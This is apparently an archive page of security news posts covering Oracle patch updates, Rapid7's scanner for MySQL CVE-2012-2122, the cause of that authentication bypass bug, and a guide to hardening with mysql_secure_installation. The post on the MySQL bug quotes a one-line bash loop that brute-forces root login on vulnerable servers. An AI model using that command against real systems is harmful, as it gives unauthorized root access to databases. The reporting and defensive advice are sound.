September 27, 2016

Oracle fixes 113 security vulnerabilities, 20 just in Java

Oracle_ai(LiveHacking.Com) – Oracle has released a mammoth set of patches to address 113 security related problems across a wide range of its products. The patch release, which Oracle refers to as a Critical Patch Update (CPU), contains 113 new security fixes for a wide range of product families including: Oracle Database, Oracle Fusion Middleware, Oracle Hyperion, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite, Oracle PeopleSoft Enterprise, Oracle Siebel CRM, Oracle Industry Applications, Oracle Java SE, Oracle Linux and Virtualization, Oracle MySQL, and Oracle and Sun Systems Products Suite.

Although all of the patches from Oracle should be considered important, the set that will get the most attention are the latest patches for Java. Oracle patched 20 vulnerabilities in Java. Eight of the 20 vulnerabilities could allow a hacker to completely compromise a target client. These vulnerabilities are described as being remote exploits which don’t require authentication. In total the CPU provides fixes for 17 Java SE client vulnerabilities, 1 for a JSSE vulnerability affecting client and server, and 2 vulnerabilities affecting Java client and server.

Oracle also points out that Windows XP users should upgrade to a new operating system. The security advisory says that “running unsupported operating systems, particularly one as prevalent as Windows XP, create a very significant risk to users of these systems as vulnerabilities are widely known, exploit kits routinely available, and security patches no longer provided by the OS provider.”

This CPU also includes 5 fixes for the Oracle Database, 29 new security fixes for Oracle Fusion Middleware, 5 fixes for Oracle E-Business Suite, and 3 for the Oracle Sun Systems Products Suite. According to the United States Computer Emergency Readiness Team (US-CERT), the update also include 15 patches for Oracle Virtualization products, and 10 fixes for MySQL.

“Critical Patch Update fixes are intended to address significant security vulnerabilities in Oracle products and also include code fixes that are prerequisites for the security fixes. As a result, Oracle recommends that this Critical Patch Update be applied as soon as possible by customers using the affected products,” wrote Eric Maurice on Oracle’s security blog.

Oracle releases Critical Patch Updates the Tuesday closest to the 17th day of January, April, July and October. The next CPU is due on 14 October 2014.

Rapid 7 releases MySQL authentication bypass vulnerability scanning tool

(LiveHacking.Com) – Rapid 7, the people behind Metasploit, have released a free scanning tool which can probe all the MySQL servers on a network and see if any of them are vulnerable to the MySQL  authentication bypass vulnerability (CVE-2012-2122). The vulnerability, which was found in June, allows remote attackers to bypass the MySQL authentication by repeatedly authenticating with the same incorrect password.

The problem is that when a user connects to MySQL (or MariaDB), a hash of the password is used and compared with the sent password. But, because of a casting bug and because of the  way memcmp() is implemented in some libraries, sometimes the token and the expected password are considered equal even when they are not.The probability of hitting this bug and authenticating without the right password is about 1 in 256.

The new tool, ScanNow, will tell you if you have this MySQL vulnerability on your systems. It can scan a range of IP addresses and ports and create a report which can be saved for later reference.

Although free and scans for unlimited IPs, the tool ONLY checks for the MySQL CVE-2012-2122 vulnerability, it does not check for any other weaknesses.

Oracle to patch 88 new security vulnerabilities

(LiveHacking.Com) – Oracle has published a pre-release announcement for a Critical Patch Update that the company intends to make public on Tuesday, July 17, 2012. Oracle’s Critical Patch Updates are a collection of patches designed to address security vulnerabilities in the Oracle product range. July’s Critical Patch Update contains 88 security vulnerabilities.

The most significant products to be patched include Oracle Database 11g, Oracle Database 10g, GlassFish Enterprise Server, Solaris and MySQL. This Critical Patch Update contains four security fixes for the Oracle Database Server. Three of these vulnerabilities may be remotely exploitable without authentication, however none of these fixes are applicable to client-only installations, i.e., installations that do not have the Oracle Database Server installed.

25 vulnerabilities will also be patched in the Oracle Sun Products Suite (which includes the GlassFish Enterprise Server and Solaris). 17 of these vulnerabilities may be remotely exploitable without authentication. Oracle will also fix 6 security problems in MySQL, however none of these vulnerabilities may be remotely exploitable without authentication.

The full list of affected products is:

  • Oracle Database 11g Release 2, versions 11.2.0.2, 11.2.0.3
  • Oracle Database 11g Release 1, version 11.1.0.7
  • Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4, 10.2.0.5
  • Oracle Secure Backup, version 10.3.0.3, 10.4.0.1
  • Oracle Fusion Middleware 11g Release 2, version 11.1.2.0
  • Oracle Fusion Middleware 11g Release 1, versions 11.1.1.5, 11.1.1.6
  • Oracle Application Server 10g Release 3, version 10.1.3.5
  • Oracle Identity Management 10g, version 10.1.4.3
  • Hyperion BI+, version 11.1.1.x
  • Oracle JRockit versions, R28.2.3 and earlier, R27.7.2 and earlier
  • Oracle Map Viewer, versions 10.1.3.1, 11.1.1.5, 11.1.1.6
  • Oracle Outside In Technology, versions 8.3.5, 8.3.7
  • Enterprise Manager Plugin for Database 12c Release 1, versions 12.1.0.1, 12.1.0.2
  • Enterprise Manager Grid Control 11g Release 1, version 11.1.0.1
  • Enterprise Manager Grid Control 10g Release 1, version 10.2.0.5
  • Oracle E-Business Suite Release 12, versions 12.0.4, 12.0.6, 12.1.1, 12.1.2, 12.1.3
  • Oracle E-Business Suite Release 11i, version 11.5.10.2
  • Oracle Transportation Management, versions 5.5.06, 6.0, 6.1, 6.2
  • Oracle AutoVue, versions 20.0.2, 20.1
  • Oracle PeopleSoft Enterprise HRMS, versions 9.0, 9.1
  • Oracle PeopleSoft Enterprise PeopleTools, versions 8.50, 8.51, 8.52
  • Oracle Siebel CRM, versions 8.1.1, 8.2.2
  • Oracle Clinical Remote Data Capture Option, versions 4.6, 4.6.2, 4.6.3
  • Oracle Sun Product Suite
  • Oracle MySQL Server, versions 5.1, 5.5

MySQL allows root access for every 1 in 256 login attempts without a password

(LiveHacking.Com) – A serious security vulnerability has been found in MySQL and MariaDB that allows a remote attacker to gain root access to a database if they attempted to login (with the wrong password) around 256 times. The vulnerability, which was disclosed by Sergei Golubchik – the MariaDB Security Coordinator, occurs because some versions of memcmp() can return an arbitrary integer (outside of the normal -128 to 127 range).

The problem is that when a user connects to MySQL or MariaDB, a hash of the password is used and compared with the sent password. But, because of a casting bug, sometimes the token and the expected password are considered equal even when they are not. This can happen if memcmp() returns a non-zero value. Because the authentication protocol uses random strings, the probability of hitting this bug is about 1 in 256.

HD Moore, creator of Metasploit, has provided a simple one line bash script which will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Of course to run the script you need to have shell access to the machine in question. All MySQL and MariaDB versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected. Neither are MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23.

Some good news

This is of course a massive security hole and Moore reckons that about 50 percent of Internet servers are vulnerable to the attack. However for systems which don’t open the MySQL port to the Internet then attackers won’t be able to access the MySQL database at all. Also many versions of Linux aren’t vulnerable due to the version of memcmp() they use. Since memcmp is part of the standard C library there are a variety of implementations. The gcc builtin version of memcmp() is safe, memcmp() in BSD’s libc is also safe. However Linux distributions that use glibc with sse-optimizations is not safe.

This means that the following version of Linux are vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log
  • Debian Unstable 64-bit 5.5.23-2
  • Fedora
  • Arch Linux

It is worth noting that official builds of MySQL and MariaDB (including the Windows versions) are not vulnerable and that Red Hat Enterprise Linux 4, 5, and 6 and CentOS are also unaffected. Also the 32-bit versions of Ubuntu are not affected.

Oracle Releases 88 New Security Fixes

(LiveHacking.Com) – Oracle has released a massive security update to fix 88 security vulnerabilities many of which are remote code execution issues that can be exploited without user authentication. The update affects a whole range of Oracle products including Oracle Database 10g and 11g, Oracle JDeveloper, Oracle PeopleSoft Enterprise, Solaris and MySQL.

Oracle Database
Among the patches are six security fixes for the Oracle Database Server. Three of these vulnerabilities may be remotely exploitable without authentication (meaning that can be exploited over a network without the need for a username and password). One of these fixes is applicable to client-only installations (in other words installations that do not have the Oracle Database Server installed).

Solaris
The Oracle update includes 15 new security fixes for the Oracle Sun Products Suite. Five of these vulnerabilities may be remotely exploitable without authentication. Eight of the fixes are for Solaris and covers Solaris 8, 9, 10, 11. There are also fixes for the GlassFish Enterprise Server which is has two remotely exploitable vulnerabilities.

MySQL
MySQL has also been updated. There are six new security fixes but none of these vulnerabilities are remotely exploitable without authentication.

The Rest

  • 11 new security fixes for Oracle Fusion Middleware. 9 of these vulnerabilities may be remotely exploitable without authentication.
  • 6 new security fixes for Oracle Enterprise Manager Grid Control. 4 of these vulnerabilities may be remotely exploitable without authentication.
  • 4 new security fixes for the Oracle E-Business Suite. All of these vulnerabilities may be remotely exploitable without authentication.
  • 5 new security fixes for the Oracle Supply Chain Products Suite. 4 of these vulnerabilities may be remotely exploitable without authentication.
  • 15 new security fixes for Oracle PeopleSoft Products. 1 of these vulnerabilities may be remotely exploitable without authentication.
  • 2 new security fixes for Oracle Industry Applications.
  • 17 new security fixes for Oracle Financial Services Software. 1 of these vulnerabilities may be remotely exploitable without authentication
  • 1 new security fix for the Oracle Primavera Products Suite. This vulnerability is remotely exploitable without authentication.

Oracle Fixes 78 Vulnerabilities But Questions Arise About Fundamental Flaws in its Flagship Database Product

(LiveHacking.Com) – Oracle has released 78 security fixes, for its flagship database software, Fusion Middleware, e-Business Suite, Supply Chain, PeopleSoft, JDEdwards and Sun products, as part of January’s Critical Patch Update (CPU). Included were two fixes for the Oracle Database Server, seventeen for Oracle Sun products, three for Oracle Virtualization and a massive 27 in Oracle MySQL. Only 16 of the 78 fixes are considered critical, or could be remotely exploited without authentication.

“Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.” said Oracle in the advisory.

The highest scored vulnerabilities, under the Common Vulnerability Scoring Standard (CVSS), are found in the Solaris operating system. The first is a denial of service bug and the second a Kerberos issue.

Oracle also patched MySQL Server 27 times, including one vulnerability in the MySQL protocol that allows a remote attacker to significantly affect the availability of the database. Another, higher-rated vulnerability, while not remotely exploitable without authentication, could both affect availability and potentially expose the confidentiality of data in the database. Some pundits are accusing Oracle of “throwing in the towel” on patching its flagship database as it received only two patches compared to MySQL’s 27.

However, now that the CPU has been issued, InfoWorld has published a story about “a flaw in Oracle’s flagship database software that could have serious repercussions for Oracle database customers, potentially compromising the security and stability of Oracle database systems.” When they contacted Oracle about the flaw they were asked, in the interest of security, to withhold the story until Oracle had time to develop and test patches that addressed the flaw.

 

Oracle to Patch 78 Security Vulnerabilities Across Hundreds of its Products

(LiveHacking.Com) – Oracle has published a critical patch update pre-release announcement where it outlines its intention to patch 78 security vulnerabilities across hundreds of its products. Scheduled for Tuesday, January 17, 2012, the jumbo set of patches affect products such as Oracle Database (10g and 11g), VirtualBox and MySQL.

For Oracle Database  there are two security fixes one of which may be remotely exploitable without authentication. This Critical Patch Update also contains three new security fixes for Oracle VM VirtualBox and Oracle Virtual Desktop Infrastructure (VDI), however none of these vulnerabilities may be remotely exploitable without authentication. The MySQL patch set is larger with 27 vulnerabilities scheduled to be patched. One of these vulnerabilities may be remotely exploitable without authentication.

Affected Products and Components

Security vulnerabilities addressed by Oracle’s Critical Patch Update affect the following products:

  • Oracle Database 11g Release 2, versions 11.2.0.2, 11.2.0.3
  • Oracle Database 11g Release 1, version 11.1.0.7
  • Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4, 10.2.0.5
  • Oracle Database 10g Release 1, version 10.1.0.5
  • Oracle Fusion Middleware 11g Release 1, versions 11.1.1.3.0, 11.1.1.4.0, 11.1.1.5.0
  • Oracle Application Server 10g Release 3, version 10.1.3.5.0
  • Oracle Outside In Technology, versions 8.3.5, 8.3.7
  • Oracle WebLogic Server, versions 9.2.4, 10.0.2, 11gR1 (10.3.3, 10.3.4, 10.3.5)
  • Oracle E-Business Suite Release 12, versions 12.1.2, 12.1.3
  • Oracle E-Business Suite Release 11i, version 11.5.10.2
  • Oracle Transportation Management, versions 5.5.06, 6.0, 6.1, 6.2
  • Oracle PeopleSoft Enterprise CRM, version 8.9
  • Oracle PeopleSoft Enterprise HCM, versions 8.9, 9.0, 9.1
  • Oracle PeopleSoft Enterprise PeopleTools, version 8.52
  • Oracle JDEdwards, version 8.98
  • Oracle Sun Product Suite
  • Oracle Sun Ray, version 5.3
  • Oracle VM VirtualBox, version 4.1
  • Oracle Virtual Desktop Infrastructure, version 3.2
  • Oracle MySQL Server, versions 5.0, 5.1, 5.5, 5.6

Hardening MySQL with mysql_secure_installation

A default Linux MySQL installation isn’t necessarily secure but a hardening script called mysql_secure_installation comes with the MySQL server to increase the default security. To run it, open a terminal window and as root (either using sudo or su -) type: mysql_secure_installation and press Enter.

The script will guide you through several steps to lockdown the MySQL installation.

The first step is to set the root password. By default a root password isn’t set, so to set it, hit Enter when asked for the current password (meaning blank) and then set the password as directed. Setting the root password ensures that nobody can log into the MySQL root user without the proper authorisation.

By default, a MySQL installation has an anonymous user, allowing anyone to log into MySQL without having to have a user account. The anonymous user is there just for testing. Type ‘y’ and hit Enter when asked to remove the anonymous user account.

To ensure that the root user can not login over the network (and allow root connections only from the local machine). Type ‘y’ and hit Enter when asked to disallow remote roots.

By default, MySQL comes with a database named ‘test’ that anyone can access. This is also intended only for testing, and should be removed before moving into a production environment. To remove it type ‘y’ and hit Enter when asked.

And that is it, if you answered positively to all the steps above your MySQL installation should now be secure.

Running mysql_secure_installation is recommended for all MySQL servers in production use.